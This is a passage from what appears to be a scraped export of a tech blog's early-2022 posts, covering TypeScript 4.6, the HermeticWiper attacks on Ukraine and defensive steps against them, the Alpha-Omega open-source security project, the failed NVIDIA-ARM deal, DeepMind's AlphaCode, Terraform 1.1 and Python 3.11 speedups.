processing — basically anywhere you\u0026rsquo;re pattern-matching on tagged unions.\nI refactored a middleware layer in a project this morning to take advantage of this, removing about 30 type assertions that were previously necessary to make the compiler happy. The code is cleaner, and more importantly, those type assertions were hiding potential bugs. Letting the compiler do proper narrowing means it can actually catch mistakes.\nIndexed Access Inference Improvements # TypeScript 4.6 also improves inference for indexed access types. 
When you write generic functions that index into objects using type parameters, the compiler is now smarter about inferring the relationship between the key and the resulting value type.\nThis matters for utility functions — the kind of type-safe get and set helpers that every large codebase eventually needs. Previously, you\u0026rsquo;d often have to add explicit type annotations or use intermediate type assertions to guide the compiler. Now, more of these patterns \u0026ldquo;just work\u0026rdquo; with inference alone.\nFor library authors, this is particularly welcome. If you maintain typed APIs or ORM layers, you\u0026rsquo;ve probably fought with indexed access inference before. Less fighting with the type system means more time solving actual problems. The trend of incremental type safety improvements continues to make TypeScript more practical for real-world development.\nSyntax Checking in JavaScript Files # A smaller but appreciated change: TypeScript now reports syntax errors in JavaScript files. If you\u0026rsquo;re using checkJs or // @ts-check comments (and you should be — it\u0026rsquo;s one of the easiest ways to add type safety incrementally), the compiler will now catch basic syntax errors that previously slipped through.\nThis fills a gap that always felt odd. You\u0026rsquo;d enable JavaScript checking, get great type errors, but miss a stray comma or bracket that would blow up at runtime. Now the tooling is more consistent.\nPerformance: trace and generateTrace # For large projects, the --generateTrace flag (available since TypeScript 4.1) produces detailed performance traces you can load in Chrome DevTools\u0026rsquo; performance panel or Perfetto, and the 4.6 release accompanies it with the @typescript/analyze-trace tool, which summarizes those traces into something easier to read. 
If you\u0026rsquo;ve ever wondered why your TypeScript compilation takes 45 seconds, this is how you find out.\nI ran this against one of our larger monorepo projects (roughly 800 TypeScript files) and immediately identified a few type definitions that were causing the compiler to spend disproportionate time on type instantiation. One overly-complex mapped type was responsible for about 15% of total compile time. Simplifying it cut our incremental build from 12 seconds to under 9 seconds. That kind of improvement compounds across a team of developers rebuilding dozens of times per day.\nES Module Support in Node.js # TypeScript 4.6 also improves support for ES modules in Node.js through the node12 and nodenext module resolution modes that were introduced in 4.5. While this is still somewhat experimental, it\u0026rsquo;s getting more stable with each release. The ecosystem is slowly but surely moving toward native ES modules in Node.js, and TypeScript needs to keep pace.\nIf you haven\u0026rsquo;t started thinking about your ESM migration strategy, now\u0026rsquo;s a good time. The Node.js ecosystem\u0026rsquo;s transition from CommonJS to ES modules is happening, and it\u0026rsquo;s going to touch every project eventually. TypeScript\u0026rsquo;s improving support makes the migration path clearer.\nMy Take # TypeScript releases rarely make front-page news, but they consistently make my working life better. Version 4.6 is a perfect example of the TypeScript team\u0026rsquo;s approach: no dramatic breaking changes, just steady improvements to type inference, performance tooling, and developer experience.\nThe control flow analysis improvement for destructured unions is my favorite feature in this release. It removes a class of type assertions that always felt like working around the compiler rather than with it. Every removed as cast is a potential bug the compiler can now catch.\nIf you\u0026rsquo;re on a recent 4.x version, the upgrade should be smooth. 
Run your test suite, check your CI, and enjoy slightly smarter type checking. That\u0026rsquo;s the TypeScript way — boring in the best possible sense.\nFor teams still evaluating TypeScript adoption, the language has never been more mature. The type system is expressive enough to model complex domain logic, the tooling is excellent, and the incremental adoption story (via checkJs and gradual strictness) means you don\u0026rsquo;t have to rewrite your project to get value. If you\u0026rsquo;re writing Node.js or frontend code without TypeScript in 2022, you\u0026rsquo;re leaving safety and productivity on the table.\n","date":"3 March 2022","externalUrl":null,"permalink":"/posts/220303-typescript-4-6-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.6 brings improved control flow analysis, better type narrowing for destructured discriminated unions, and performance improvements that matter for large codebases.","title":"TypeScript 4.6 Drops — Smarter Type Narrowing and Real-World Wins","type":"posts"},{"content":"Today is a dark day. Russia has launched a military invasion of Ukraine, and alongside the physical assault, we\u0026rsquo;re witnessing one of the most significant cyber operations ever deployed in conjunction with conventional warfare. Security researchers at ESET and Symantec have identified a new destructive malware dubbed \u0026ldquo;HermeticWiper\u0026rdquo; that has been deployed against Ukrainian organizations. This isn\u0026rsquo;t ransomware looking for a payout — it\u0026rsquo;s pure destruction, designed to render systems unbootable.\nWhat HermeticWiper Does # The technical details emerging from ESET\u0026rsquo;s analysis paint a picture of deliberate, targeted destruction. HermeticWiper abuses legitimate drivers from the EaseUS Partition Master software to gain low-level disk access, then systematically corrupts the Master Boot Record (MBR) and partition tables. 
It targets the first 512 bytes of every physical drive, effectively destroying the system\u0026rsquo;s ability to boot.\nWhat\u0026rsquo;s particularly noteworthy is the compilation timestamp on the malware samples: December 28, 2021. This suggests the operation was planned months in advance, well before the diplomatic situation reached its current crisis point. The certificate used to sign the malware was issued to a Cypriot company called \u0026ldquo;Hermetica Digital Ltd\u0026rdquo; — hence the name — and appears to have been obtained specifically for this purpose.\nThis isn\u0026rsquo;t a vulnerability exploit or a clever zero-day. It\u0026rsquo;s a brute-force destructive tool, and its effectiveness comes from the coordinated timing of its deployment, not from technical sophistication.\nThe Broader Cyber Campaign # HermeticWiper didn\u0026rsquo;t arrive in isolation. Over the past weeks, Ukrainian government websites were defaced and taken offline in DDoS attacks. A separate piece of malware called WhisperGate was discovered targeting Ukrainian systems back in January, using a similar wiper approach disguised as ransomware. Microsoft\u0026rsquo;s Threat Intelligence Center documented that campaign in mid-January.\nWhat we\u0026rsquo;re seeing is the operational integration of cyber capabilities with conventional military operations. DDoS attacks to disrupt communications, wiper malware to destroy data and systems, phishing campaigns against government officials — all synchronized with physical military movements. This is what cyber warfare theorists have been warning about for years, and it\u0026rsquo;s now playing out in real time.\nImplications for the Rest of Us # If you\u0026rsquo;re not operating in Ukraine, you might be tempted to think this doesn\u0026rsquo;t affect you. I\u0026rsquo;d push back on that. Hard.\nFirst, there\u0026rsquo;s the direct risk of spillover. 
NotPetya in 2017 was deployed as a targeted attack against Ukrainian tax software but ended up causing over $10 billion in damages worldwide, hitting Maersk, FedEx, Merck, and countless others. Destructive malware doesn\u0026rsquo;t respect borders or IP address ranges. CISA has issued a \u0026ldquo;Shields Up\u0026rdquo; advisory urging all organizations to adopt a heightened cybersecurity posture.\nSecond, the tactics being used here will be studied, refined, and replicated by threat actors worldwide. The playbook of combining wipers with legitimate signed drivers to bypass security tools is now public knowledge. Expect to see variations of this approach in criminal malware within months.\nThird, this situation highlights the absolute criticality of offline backups and disaster recovery plans. Wiper malware doesn\u0026rsquo;t give you a negotiation option. There\u0026rsquo;s no decryption key to buy. Your data is gone, your systems are bricked, and your recovery time is measured by how good your backup strategy is.\nPractical Steps for Defense # I\u0026rsquo;ve spent this morning reviewing our own security posture, and here\u0026rsquo;s what I\u0026rsquo;d recommend every team prioritize:\nBackup verification: Not \u0026ldquo;do you have backups\u0026rdquo; but \u0026ldquo;have you tested a full restore this quarter?\u0026rdquo; Offline, air-gapped backups are your last line of defense against wipers.\nNetwork segmentation: If wiper malware gets into one system, can it reach your entire infrastructure? Flat networks are wiper playgrounds.\nEndpoint detection: Ensure your EDR solutions are updated. The security community is actively sharing indicators of compromise (IOCs) for HermeticWiper — make sure your tools can detect them.\nPatch aggressively: This is always good advice, but right now it\u0026rsquo;s critical. 
Known vulnerabilities are the easiest path in, and state-sponsored actors have deep catalogs of exploits.\nMonitor for anomalies: Unusual authentication patterns, unexpected administrative tool usage, large-scale file modifications — these are the signals that precede a wiper deployment.\nMy Take # I\u0026rsquo;ve been working in tech for three decades, and I\u0026rsquo;ve watched cybersecurity evolve from an afterthought to a boardroom concern. But watching malware deployed in coordination with missiles and tanks hits different. This isn\u0026rsquo;t a theoretical exercise anymore.\nFor those of us who build and maintain systems, today is a reminder that security isn\u0026rsquo;t a feature — it\u0026rsquo;s a fundamental responsibility. The systems we build, the data we steward, the infrastructure we operate — these things matter to real people. When those systems are destroyed, real consequences follow.\nMy thoughts are with the people of Ukraine today. For the rest of us, the best thing we can do professionally is take the CISA Shields Up guidance seriously and make sure our own houses are in order. The threat landscape just changed permanently.\n","date":"24 February 2022","externalUrl":null,"permalink":"/posts/220224-hermeticwiper-ukraine-cyber-warfare/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As conflict erupts in Ukraine, destructive wiper malware targeting critical infrastructure signals a new chapter in state-sponsored cyber operations.","title":"HermeticWiper and the New Reality of Cyber Warfare","type":"posts"},{"content":"The open source security story has been building for a while now. After the Log4Shell vulnerability shook the industry in December, everyone has been asking the same question: how do we prevent this from happening again? 
This week, the Linux Foundation and the Open Source Security Foundation (OpenSSF) announced the Alpha-Omega Project, backed with $5 million in initial funding from Google and Microsoft. It\u0026rsquo;s one of the most concrete answers we\u0026rsquo;ve seen yet.\nWhat Alpha-Omega Actually Does # The name describes the approach neatly. The \u0026ldquo;Alpha\u0026rdquo; part focuses on the most critical open source projects — the ones that, like Log4j, underpin vast swaths of the internet\u0026rsquo;s infrastructure. These projects get dedicated security experts assigned to work directly with maintainers on vulnerability identification, code audits, and security hardening. Think of it as embedding security engineers into the projects that matter most.\nThe \u0026ldquo;Omega\u0026rdquo; part takes a broader approach, targeting at least 10,000 widely-deployed open source projects with automated security analysis, fuzzing, and tooling. This is where scale comes in — you can\u0026rsquo;t hand-audit every npm package or Python library that sits in critical dependency chains, but you can run automated tools against them systematically.\nIt\u0026rsquo;s a smart two-pronged strategy. You address the known critical infrastructure with focused human expertise, and you cast a wide net over the long tail with automation.\nWhy This Matters Now # If you\u0026rsquo;ve been in this industry long enough, you\u0026rsquo;ve seen the \u0026ldquo;open source sustainability\u0026rdquo; conversation come and go in waves. What\u0026rsquo;s different this time is that the conversation has shifted from sustainability to security, and the money is following.\nThe Log4Shell incident was a wake-up call, but it wasn\u0026rsquo;t the first alarm. The SolarWinds supply chain attack in 2020 demonstrated how compromised build processes could cascade through organizations. The Codecov breach last year showed supply chain attacks hitting developer tooling directly. 
And the ongoing dependency confusion research has highlighted how easy it is to inject malicious packages into build pipelines.\nWhat ties these together is a fundamental truth: modern software is built on layers of open source dependencies, and the security of those dependencies is only as strong as the maintainers who support them. Many critical projects are maintained by one or two people in their spare time. That\u0026rsquo;s not a criticism — it\u0026rsquo;s a structural problem that requires structural solutions.\nThe Funding Question # Five million dollars is a start, but let\u0026rsquo;s be honest: it\u0026rsquo;s a rounding error for Google and Microsoft. The real question is whether this signals a sustained commitment or a PR response to Log4Shell pressure.\nI\u0026rsquo;m cautiously optimistic. The OpenSSF has been building infrastructure for this kind of work for a while now. Projects like Sigstore for artifact signing, SLSA for supply chain integrity, and Scorecard for automated security assessment are all coming together into something that looks like a coherent strategy. Alpha-Omega adds the human element that pure tooling can\u0026rsquo;t replace.\nWhat I\u0026rsquo;d like to see next is direct engagement with package registries — npm, PyPI, crates.io, Maven Central. These are the distribution points where security interventions have the highest leverage. If every package published to npm had automated security scanning as part of the publish pipeline, we\u0026rsquo;d catch a meaningful percentage of problems before they reach anyone\u0026rsquo;s node_modules.\nWhat You Can Do Today # While waiting for the industry to sort itself out, there are practical steps every development team should be taking right now. Lock your dependency versions. Use tools like npm audit, pip-audit, or cargo audit in your CI pipelines. Set up Dependabot or Renovate for automated dependency updates. 
Review your SBOM (Software Bill of Materials) — if you don\u0026rsquo;t have one, that\u0026rsquo;s your first action item.\nI\u0026rsquo;ve been running npm audit in CI for years, failing builds on high-severity vulnerabilities. It\u0026rsquo;s a blunt instrument, but it catches things. More recently, I\u0026rsquo;ve started integrating Snyk into our pipeline for deeper analysis. The tooling has gotten significantly better even in the last year.\nMy Take # The Alpha-Omega Project represents something I\u0026rsquo;ve been wanting to see for over a decade: major tech companies putting real resources behind the open source infrastructure they depend on. Not just sponsoring conferences or buying laptops for maintainers, but funding systematic security work.\nIs it enough? No. But it\u0026rsquo;s a meaningful step in the right direction, and it comes with the institutional backing of the Linux Foundation and OpenSSF, which gives it a better chance of lasting beyond the current news cycle.\nThe security of our software supply chain is everyone\u0026rsquo;s problem. If you\u0026rsquo;re a developer reading this, take an hour this week to audit your project\u0026rsquo;s dependencies. You might be surprised what you find.\n","date":"17 February 2022","externalUrl":null,"permalink":"/posts/220217-alpha-omega-open-source-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Linux Foundation’s new Alpha-Omega Project, backed by Google and Microsoft, aims to systematically improve the security of critical open source software.","title":"Alpha-Omega Project — The Linux Foundation Gets Serious About Open Source Security","type":"posts"},{"content":"After more than a year of regulatory scrutiny spanning the US, EU, UK, and China, NVIDIA has officially abandoned its $40 billion acquisition of ARM Holdings. The deal, first announced in September 2020, would have been the largest semiconductor acquisition in history. 
Instead, SoftBank — ARM\u0026rsquo;s current owner — is now preparing ARM for an IPO. For those of us who build software that ultimately runs on these chips, this outcome matters more than you might think.\nWhy Regulators Said No # The opposition was broad and unusually unified. The FTC filed an antitrust lawsuit in December, the UK\u0026rsquo;s Competition and Markets Authority raised serious concerns, and the EU had opened a formal investigation. The core worry was straightforward: NVIDIA, a major chip designer, would gain control over ARM\u0026rsquo;s architecture that powers virtually every smartphone on the planet and an increasing share of server workloads.\nARM\u0026rsquo;s business model depends on being a neutral licensor. Companies like Qualcomm, Apple, Samsung, Amazon, and yes, even NVIDIA itself, all license ARM designs. Handing that neutral platform to one of its biggest licensees struck regulators as a recipe for competitive harm. Qualcomm and other ARM licensees had been lobbying hard against the deal, and it\u0026rsquo;s hard to blame them.\nThe Developer Angle # If you\u0026rsquo;re wondering why a chip deal matters to software engineers, consider how much the ARM ecosystem has expanded in the last two years. Apple\u0026rsquo;s M1 chips have proven that ARM can compete at the high end of desktop and laptop computing. AWS Graviton processors are handling production workloads at scale, often at better price-performance ratios than their x86 counterparts. Microsoft is pushing ARM-based Windows development forward.\nHad NVIDIA acquired ARM, there was a real risk that this ecosystem could have fractured. Would Apple have continued investing as heavily in ARM if a direct competitor owned the instruction set architecture? Would AWS have felt comfortable building Graviton4 on an architecture controlled by a company that also sells cloud GPU instances? 
These aren\u0026rsquo;t hypothetical concerns — they\u0026rsquo;re the exact scenarios that kept regulators up at night.\nAs developers, we benefit enormously from a competitive ARM ecosystem. Cross-compilation targets, CI/CD pipelines that build for ARM, container images optimized for Graviton — all of this thrives when the underlying architecture remains openly licensed and vendor-neutral.\nARM\u0026rsquo;s Path Forward # SoftBank\u0026rsquo;s plan to take ARM public is arguably the best outcome for the broader tech ecosystem. An independent ARM, accountable to public shareholders and a diverse customer base, has every incentive to keep innovating without playing favorites. The company has been investing in ARMv9, which brings significant improvements to security, vector processing, and machine learning workloads.\nI\u0026rsquo;m particularly watching the server space. ARM-based instances are becoming my default recommendation for new cloud deployments where the workload allows it. The price-performance advantage on AWS Graviton2 and Graviton3 instances is real and measurable — I\u0026rsquo;ve seen 20-30% cost reductions on Node.js and Python workloads just by switching instance families.\nMy Take # Honestly, I\u0026rsquo;m relieved. I\u0026rsquo;ve been building software on ARM-based systems since the early days of Raspberry Pi tinkering, and I\u0026rsquo;ve watched the architecture grow from \u0026ldquo;that thing in phones\u0026rdquo; to a legitimate force in every computing segment. That growth happened precisely because ARM operated as a neutral, widely-licensed platform.\nNVIDIA is an extraordinary company — their GPU ecosystem and CUDA platform are unmatched — but concentrating ARM\u0026rsquo;s architecture under their roof would have been a step backward for the industry. 
Sometimes the most pro-innovation outcome is preventing consolidation rather than enabling it.\nThe next chapter for ARM as an independent, publicly traded company could be its most interesting yet. With the architecture showing up in everything from edge IoT devices to hyperscale data centers, the neutral licensing model has never been more valuable. I\u0026rsquo;ll be watching the IPO with genuine interest — not as an investment tip, but as a signal for where the compute landscape is heading.\nFor now, I\u0026rsquo;m going back to optimizing some container builds for multi-arch deployment. ARM and x86 side by side, as it should be.\n","date":"10 February 2022","externalUrl":null,"permalink":"/posts/220210-nvidia-arm-deal-collapse/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s $40 billion bid for ARM has officially fallen apart under regulatory pressure, and the implications for the semiconductor landscape are enormous.","title":"NVIDIA-ARM Deal Collapses — What It Means for the Chip Industry","type":"posts"},{"content":"DeepMind published a preprint paper this week introducing AlphaCode, an AI system that can compete at a roughly average human level in programming competitions on Codeforces. The system was evaluated on recent contests (to avoid data leakage from training) and placed within the top 54% of participants — roughly the level of a competent competitive programmer.\nThis is a different kind of achievement than what we\u0026rsquo;ve seen from GitHub Copilot or other code completion tools. AlphaCode isn\u0026rsquo;t autocompleting lines of code — it\u0026rsquo;s reading problem descriptions in natural language, reasoning about algorithms, and generating complete solutions. That\u0026rsquo;s a qualitatively different capability, and it\u0026rsquo;s worth understanding what it does and doesn\u0026rsquo;t mean.\nHow AlphaCode Works # The technical approach is both impressive and revealing. 
AlphaCode uses a large transformer model (similar in architecture to GPT-3) trained on a massive corpus of code from GitHub. But the interesting part is what happens at inference time.\nFor each problem, AlphaCode generates up to a million candidate solutions. Yes, a million. It then uses a clustering and filtering pipeline to narrow these down to roughly 10 submissions, which are evaluated against the contest\u0026rsquo;s test cases. The system essentially brute-forces the solution space with massive sampling, then uses learned heuristics to pick the best candidates.\nThis is fundamentally different from how a human competitive programmer works. A skilled human reads the problem, identifies the algorithmic approach (dynamic programming, graph traversal, greedy, etc.), and writes one or maybe two solutions. AlphaCode compensates for weaker \u0026ldquo;understanding\u0026rdquo; with overwhelming generation capacity.\nThe filtering pipeline is doing heavy lifting here. AlphaCode clusters candidate solutions by their behavior on generated test inputs, then selects diverse representatives from each cluster. That selection ensures that the 10 submitted solutions cover different algorithmic approaches rather than being 10 minor variations of the same idea. Later AI coding systems improved on this brute-force approach significantly.\nWhat This Tells Us About AI and Programming # The results are impressive in absolute terms — placing around the median of Codeforces participants is no trivial achievement. But several aspects of the system\u0026rsquo;s design reveal the current limitations:\nThe million-sample approach is a brute-force workaround. If the model truly \u0026ldquo;understood\u0026rdquo; the problems, it wouldn\u0026rsquo;t need to generate a million candidates and filter down. The massive overgeneration suggests that the model is pattern-matching against its training data rather than reasoning from first principles. 
This works for competitive programming, where the solution space is constrained and automatically verifiable, but it doesn\u0026rsquo;t translate to real-world software engineering.\nCompetitive programming is unusually well-suited to AI. Problems are precisely specified, have clear input/output formats, come with test cases for verification, and can be solved in relatively short self-contained programs. Real software engineering involves ambiguous requirements, complex system interactions, ongoing maintenance, and communication with stakeholders. These are areas where current AI systems are much weaker.\nThe evaluation metric is forgiving. Getting 10 submissions per problem is generous — human contestants typically get one or two. And the \u0026ldquo;top 54%\u0026rdquo; ranking, while respectable, means AlphaCode is performing at a median level on what are, by programming standards, relatively well-defined problems.\nThe GitHub Copilot Comparison # I\u0026rsquo;ve been using GitHub Copilot in my daily development for several months now, and AlphaCode highlights the difference between code generation at different scales of complexity. Copilot\u0026rsquo;s evolution showed how much progress was possible.\nCopilot excels at the micro-level: completing functions, suggesting boilerplate, and occasionally producing surprisingly apt implementations of well-understood patterns. It makes me faster at writing code I already know how to write. That\u0026rsquo;s genuinely useful.\nAlphaCode operates at a higher level of abstraction — taking a problem description and producing a complete solution. 
But it requires massive computational resources, generates enormous volumes of candidates, and only works within the constrained domain of competitive programming.\nNeither system comes close to the kind of work that occupies most of a professional software engineer\u0026rsquo;s time: understanding business requirements, designing system architectures, debugging complex interactions between services, reviewing code for correctness and maintainability, and communicating technical decisions to non-technical stakeholders. Yet AI-assisted testing has emerged as a practical application.\nWhere This Is Heading # Despite my caveats, I don\u0026rsquo;t want to undersell what DeepMind has achieved. A year ago, AI systems couldn\u0026rsquo;t reliably solve even simple competitive programming problems. AlphaCode solving contest-level problems — even with brute-force sampling — represents genuine progress in machine learning for code.\nThe trajectory matters here. If we extrapolate from GPT-2 to GPT-3 to Codex, and from early code completion to Copilot to AlphaCode, the capabilities are improving faster than most people (including me) expected. The jump from \u0026ldquo;autocomplete lines of code\u0026rdquo; to \u0026ldquo;solve algorithmic problems end-to-end\u0026rdquo; happened in about 18 months.\nI expect the next iteration will significantly reduce the number of samples needed, improve the success rate on harder problems, and perhaps start to tackle problems that require more complex reasoning. The rapid evolution of AI systems has indeed followed this trajectory. Whether that leads to systems that can do meaningful software engineering — as opposed to competitive programming — remains an open question.\nMy Take # AlphaCode is an important research milestone. It demonstrates that large language models can, in a constrained setting, produce code that solves non-trivial problems. 
The competitive programming framing makes for great headlines, and DeepMind deserves credit for rigorous evaluation on unseen problems.\nBut I\u0026rsquo;d caution against the inevitable \u0026ldquo;AI will replace programmers\u0026rdquo; hot takes. The gap between solving a well-specified Codeforces problem with a million attempts and building, debugging, and maintaining a production system is vast. We\u0026rsquo;re not getting replaced. We are, however, getting better tools. And that\u0026rsquo;s been the story of software engineering for its entire history.\nWhat I find most interesting is the potential for these techniques to assist with debugging and code review — domains where generating many candidate fixes and testing them automatically could be genuinely useful. That\u0026rsquo;s a more practical near-term application than fully autonomous programming, and it\u0026rsquo;s where I expect the real value to emerge.\nThis is part of my AI in Development series, exploring how artificial intelligence is changing the practice of software engineering.\n","date":"3 February 2022","externalUrl":null,"permalink":"/posts/220203-deepmind-alphacode-ai-programming/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepMind’s AlphaCode system achieves competitive-level performance in programming contests, raising questions about what AI can and can’t do in software engineering.","title":"DeepMind's AlphaCode — When AI Enters the Coding Competition","type":"posts"},{"content":"HashiCorp released Terraform 1.1 earlier this month, and while the version number increment is modest, the features signal something important about where Infrastructure as Code is heading. 
The headline additions — moved blocks for state refactoring and convergence with Terraform Cloud workflows — address problems that have plagued real-world Terraform usage for years.\nThis release feels less like \u0026ldquo;here are cool new features\u0026rdquo; and more like \u0026ldquo;we listened to the pain points.\u0026rdquo; As someone who\u0026rsquo;s been managing infrastructure as code since the Puppet and Chef days, that kind of maturity is refreshing.\nThe Refactoring Problem, Finally Addressed # If you\u0026rsquo;ve managed a non-trivial Terraform codebase, you\u0026rsquo;ve hit this wall: you need to rename a resource or move it to a different module, but Terraform interprets this as \u0026ldquo;destroy the old thing and create a new thing.\u0026rdquo; For a development environment, that\u0026rsquo;s annoying. For a production database, it\u0026rsquo;s terrifying.\nThe traditional workaround was terraform state mv — a manual, error-prone command that operates directly on the state file. In team environments with remote state, this meant coordinating state operations carefully and hoping nobody ran a plan in between. I\u0026rsquo;ve seen teams avoid perfectly reasonable refactoring for months because the risk of a state manipulation mistake was too high.\nTerraform 1.1\u0026rsquo;s moved blocks solve this declaratively:\nmoved {\n  from = aws_instance.webapp\n  to   = module.frontend.aws_instance.webapp\n}\nThis is checked into version control, reviewed in PRs, and applied as part of a normal terraform apply. No manual state surgery, no coordination issues, no late-night incidents because someone fat-fingered a state mv command.\nIt seems like a small thing, but in practice it removes one of the biggest barriers to keeping Terraform codebases clean over time. 
Technical debt in IaC is particularly dangerous because the consequences of a bad refactoring aren\u0026rsquo;t a degraded user experience — they\u0026rsquo;re accidentally destroying production infrastructure.\nTerraform Cloud Integration # The 1.1 release also deepens the integration between the open-source CLI and Terraform Cloud. The cloud block replaces the older remote backend configuration, and the workflow for running Terraform plans remotely is more streamlined.\nThis matters because HashiCorp is clearly positioning Terraform Cloud (and its enterprise offering) as the default way to run Terraform in organizations. The open-source CLI remains free and fully functional, but the gravitational pull toward their managed platform is increasing.\nI have mixed feelings about this. On one hand, running Terraform in a managed environment with proper state locking, access controls, policy enforcement, and audit logs is genuinely better than the typical \u0026ldquo;someone runs terraform from their laptop\u0026rdquo; workflow. Terraform Cloud solves real operational problems.\nOn the other hand, the increasing coupling between the open-source tool and the commercial platform follows a pattern we\u0026rsquo;ve seen before in the DevOps space. Docker\u0026rsquo;s commercial pivot, Chef\u0026rsquo;s license change, and even HashiCorp\u0026rsquo;s own Vault Enterprise feature gating all follow similar trajectories. As users, we should be clear-eyed about the business model that supports the tools we depend on.\nThe Broader IaC Landscape in 2022 # Terraform\u0026rsquo;s continued evolution is happening in the context of a much broader IaC ecosystem. It\u0026rsquo;s worth stepping back and looking at where the alternatives stand:\nPulumi continues to gain traction with developers who prefer writing infrastructure in real programming languages (TypeScript, Python, Go) rather than HCL. 
Their recent Automation API is interesting — it lets you embed infrastructure provisioning inside application code. For teams that are already deeply invested in a specific programming language, Pulumi\u0026rsquo;s approach has clear ergonomic advantages.\nAWS CDK has established itself as the go-to for AWS-centric shops. The construct model is powerful, and the ability to compose high-level abstractions over CloudFormation resources reduces boilerplate significantly. The limitation, obviously, is the AWS lock-in.\nCrossplane is making a serious play for the Kubernetes-native infrastructure management space. If your team is already thinking in terms of Kubernetes resources and controllers, extending that model to infrastructure provisioning has a certain elegance.\nBicep is Microsoft\u0026rsquo;s answer for Azure infrastructure, offering a much more pleasant authoring experience than raw ARM templates.\nThe trend I see across all of these is convergence toward better developer experience. The early IaC tools required you to think like an infrastructure engineer. The current generation meets developers where they are — whether that\u0026rsquo;s their preferred programming language, their existing Kubernetes workflows, or their cloud provider\u0026rsquo;s native tooling.\nState Management Remains the Hard Problem # Despite all the progress in IaC tooling, state management remains the fundamental challenge. Terraform\u0026rsquo;s state file is both its greatest strength (enabling plan/apply workflows and drift detection) and its biggest operational burden (requiring locking, backup, and careful access control).\nEvery team I\u0026rsquo;ve worked with that uses Terraform at scale eventually builds custom tooling around state management. 
Whether it\u0026rsquo;s Atlantis for PR-based workflows, custom CI pipelines with state locking, or wrapper scripts that enforce safety checks, the raw Terraform CLI is rarely enough for production use.\nThe moved block in 1.1 is a step toward making state operations safer, but the underlying model — a single serialized state file that represents the truth about your infrastructure — has inherent scaling limitations. I\u0026rsquo;m curious to see whether the next generation of IaC tools will find better approaches to this problem.\nMy Take # Terraform 1.1 is a solid, mature release that addresses real operational pain points. It\u0026rsquo;s not exciting in the way that a new language or framework launch is exciting, but it\u0026rsquo;s the kind of improvement that makes daily life better for infrastructure engineers.\nIf you\u0026rsquo;re starting a new project today, Terraform remains the safe default choice for multi-cloud infrastructure management. Its provider ecosystem is unmatched, the community knowledge base is deep, and the 1.x stability guarantee means you\u0026rsquo;re not going to hit breaking changes.\nBut I\u0026rsquo;d also encourage teams to evaluate Pulumi for greenfield projects, especially if your infrastructure team is more comfortable in TypeScript or Python than HCL. 
The IaC landscape is healthily competitive right now, and that competition is driving genuine innovation in developer experience.\nThis is part of my Infrastructure Notes series, exploring the tools and practices that keep modern systems running.\n","date":"27 January 2022","externalUrl":null,"permalink":"/posts/220127-terraform-1-1-iac-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Terraform 1.1 brings moved blocks for safe refactoring and tighter Terraform Cloud integration, signaling that Infrastructure as Code tooling is growing up.","title":"Terraform 1.1 and the Maturing IaC Landscape","type":"posts"},{"content":"Python 3.11 alpha 4 dropped this week, and the benchmarks are turning heads. The Faster CPython project, led by Guido van Rossum and Mark Shannon with Microsoft\u0026rsquo;s backing, is showing real results. This continues the performance focus that started with 3.10. Early benchmarks suggest CPython 3.11 will be roughly 10-60% faster than 3.10 across a range of workloads, with the project\u0026rsquo;s stated goal being a 2x speedup over several releases.\nFor a language that\u0026rsquo;s been famously slow for three decades, this is a big deal. And the approach they\u0026rsquo;re taking is technically fascinating. The performance improvements complement Python 3.10\u0026rsquo;s pattern matching and other language improvements.\nThe Specializing Adaptive Interpreter # The headline feature driving performance gains in 3.11 is PEP 659 — the specializing adaptive interpreter. Rather than trying to optimize Python code ahead of time (which is incredibly difficult given the language\u0026rsquo;s dynamic nature), the interpreter now watches how code actually executes and optimizes hot paths at runtime.\nHere\u0026rsquo;s how it works in practice. When a bytecode instruction executes enough times (currently 8), the interpreter replaces it with a specialized version. 
For example, if a BINARY_OP instruction performing addition consistently receives two integers, it gets replaced with BINARY_OP_ADD_INT, which skips the generic type dispatch and, after a cheap type guard, goes straight to integer addition.\nIf the specialization guess turns out to be wrong (say, someone passes a string where an integer was expected), the specialized instruction \u0026ldquo;deoptimizes\u0026rdquo; back to the generic version. This is similar in principle to what JIT compilers in V8 and HotSpot do, but CPython is doing it at the bytecode level without a JIT. That\u0026rsquo;s an important distinction — it means the performance gains come without the memory overhead and warm-up costs of a full JIT compiler.\nThe implementation adds new specialized opcodes for common patterns:\nLOAD_ATTR_INSTANCE_VALUE for attribute access on regular objects BINARY_OP_ADD_INT and BINARY_OP_ADD_FLOAT for arithmetic CALL_FUNCTION_BUILTIN for calls to built-in functions Several others for common dictionary and list operations Lazy Python Frames # Another significant optimization in 3.11 is the lazy creation of Python frame objects. In previous versions, every function call created a full frame object on the Python heap. In 3.11, frames are created on the C stack by default and only materialized as Python objects when something actually needs them (like a debugger or sys._getframe()).\nThis sounds like a minor implementation detail, but function call overhead is one of Python\u0026rsquo;s most significant bottlenecks. Reducing the cost of every function call has a cascading effect across essentially all Python code. Mark Shannon\u0026rsquo;s PEP 659 implementation notes show that frame creation was one of the top consumers of CPU time in typical Python workloads.\nThe practical result: function-call-heavy code (which is most well-structured Python code) gets a meaningful speedup for free, without any code changes. 
This makes Python more viable for performance-sensitive applications.\nWhy This Time Is Different # I\u0026rsquo;ll confess to some initial skepticism. We\u0026rsquo;ve heard \u0026ldquo;Python will get faster\u0026rdquo; before. Unladen Swallow (Google\u0026rsquo;s attempt to add LLVM-based JIT compilation to CPython) was abandoned in 2011. PyPy has been \u0026ldquo;the fast Python\u0026rdquo; for over a decade but never achieved mainstream adoption due to compatibility issues with C extensions.\nThree things make the Faster CPython project different:\nFirst, it\u0026rsquo;s happening inside CPython itself. No alternative runtime, no compatibility layer, no separate ecosystem. When 3.11 ships, everyone who upgrades gets the performance improvements. That\u0026rsquo;s a distribution advantage that no external project can match.\nSecond, Guido is leading it. Having the language\u0026rsquo;s creator driving performance work means the project has both deep language knowledge and political capital within the Python community. Technical decisions that might be contentious coming from an outsider are accepted more readily when Guido\u0026rsquo;s name is attached.\nThird, Microsoft is funding it. Guido joined Microsoft\u0026rsquo;s Developer Division in 2020, and the company is paying for a small team to work on this full-time. That\u0026rsquo;s the kind of sustained investment that open source performance work needs — you 